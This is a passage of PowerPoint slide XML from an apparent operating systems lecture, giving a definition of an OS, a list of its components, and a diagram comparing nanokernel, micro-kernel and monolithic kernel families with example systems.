              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Application layers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>User interfaces</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231753440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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>operating system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is a collection of software that manages computer hardware resources and provides common services for computer programs. The operating system is a vital component of the system software in a computer system. Application programs usually require an operating system to function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183508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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>operating system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) is a collection of software that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>manages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> computer hardware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and provides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>common services</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for computer programs. The operating system is a vital component of the system software in a computer system. Application programs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>require an operating system to function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>wikipedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="299659166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an OS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Multitasking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Memory management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Driver model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Device drivers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User interface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="371304047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Families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1A8B2E0-A817-4FBB-96FF-51EECBEAA2CE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>193</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Isosceles Triangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2133600"/>
            <a:ext cx="4724400" cy="342900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glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="57785" dist="33020" dir="3180000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>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337209" y="5257800"/>
            <a:ext cx="16002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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>anokernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>small, simple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="5257800"/>
            <a:ext cx="20193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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>onolithic kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>feature-rich</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3333750" y="1828800"/>
            <a:ext cx="20193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micro-kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>secure, modular</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171128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Families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1A8B2E0-A817-4FBB-96FF-51EECBEAA2CE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>194</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Isosceles Triangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2133600"/>
            <a:ext cx="4724400" cy="342900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glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="57785" dist="33020" dir="3180000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>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337209" y="5257800"/>
            <a:ext cx="1600200" cy="60960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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>anokernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>small, simple</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="5257800"/>
            <a:ext cx="20193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t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>onolithic kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>feature-rich</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3333750" y="1828800"/>
            <a:ext cx="20193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micro-kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>secure, modular</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825591" y="1830148"/>
            <a:ext cx="2667000" cy="1828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smtClean="0"/>
              <a:t>flat memory model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>multithreading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>sync objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scheduling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>algos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>minimal footprint (2k-32k)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="4953000"/>
            <a:ext cx="7620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ecos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788886" y="5334000"/>
            <a:ext cx="108972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threadx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="4998519"/>
            <a:ext cx="12192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openrtos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406032" y="4739910"/>
            <a:ext cx="92771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viper1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385843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Families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1A8B2E0-A817-4FBB-96FF-51EECBEAA2CE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>195</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Isosceles Triangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2133600"/>
            <a:ext cx="4724400" cy="342900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glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="57785" dist="33020" dir="3180000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>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337209" y="5257800"/>
            <a:ext cx="16002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nanokernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>small, simple</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="5257800"/>
            <a:ext cx="2019300" cy="60960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monolithic kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>feature-rich</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3333750" y="1828800"/>
            <a:ext cx="20193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micro-kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>secure, modular</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825591" y="1830148"/>
            <a:ext cx="2667000" cy="243705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smtClean="0"/>
              <a:t>process isolation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>feature rich</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>posix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>api</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>networking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>file system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>500k+ kernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Oval 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="4953000"/>
            <a:ext cx="7620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ecos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Oval 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2788886" y="5334000"/>
            <a:ext cx="108972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threadx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="4998519"/>
            <a:ext cx="12192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openrtos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Oval 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406032" y="4739910"/>
            <a:ext cx="8705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viper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5929608" y="4998519"/>
            <a:ext cx="8705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linux</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Oval 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="5448300"/>
            <a:ext cx="11753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windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Oval 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4648200" y="4998519"/>
            <a:ext cx="1170816"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vxworks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Oval 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2406032" y="4739910"/>
            <a:ext cx="92771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viper1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33505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Families</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A1A8B2E0-A817-4FBB-96FF-51EECBEAA2CE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Isosceles Triangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1981200" y="2133600"/>
            <a:ext cx="4724400" cy="342900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a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
            <a:outerShdw blurRad="57785" dist="33020" dir="3180000" algn="ctr">
              <a:srgbClr val="000000">
                <a:alpha val="30000"/>
              </a:srgbClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>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337209" y="5257800"/>
            <a:ext cx="16002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nanokernel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>small, simple</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5791200" y="5257800"/>
            <a:ext cx="2019300" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="round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monolithic kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>feature-rich</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rounded Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3333750" y="1828800"/>
            <a:ext cx="2019300" cy="60960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micro-kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>secure, modular</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rounded Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5825591" y="1830148"/>
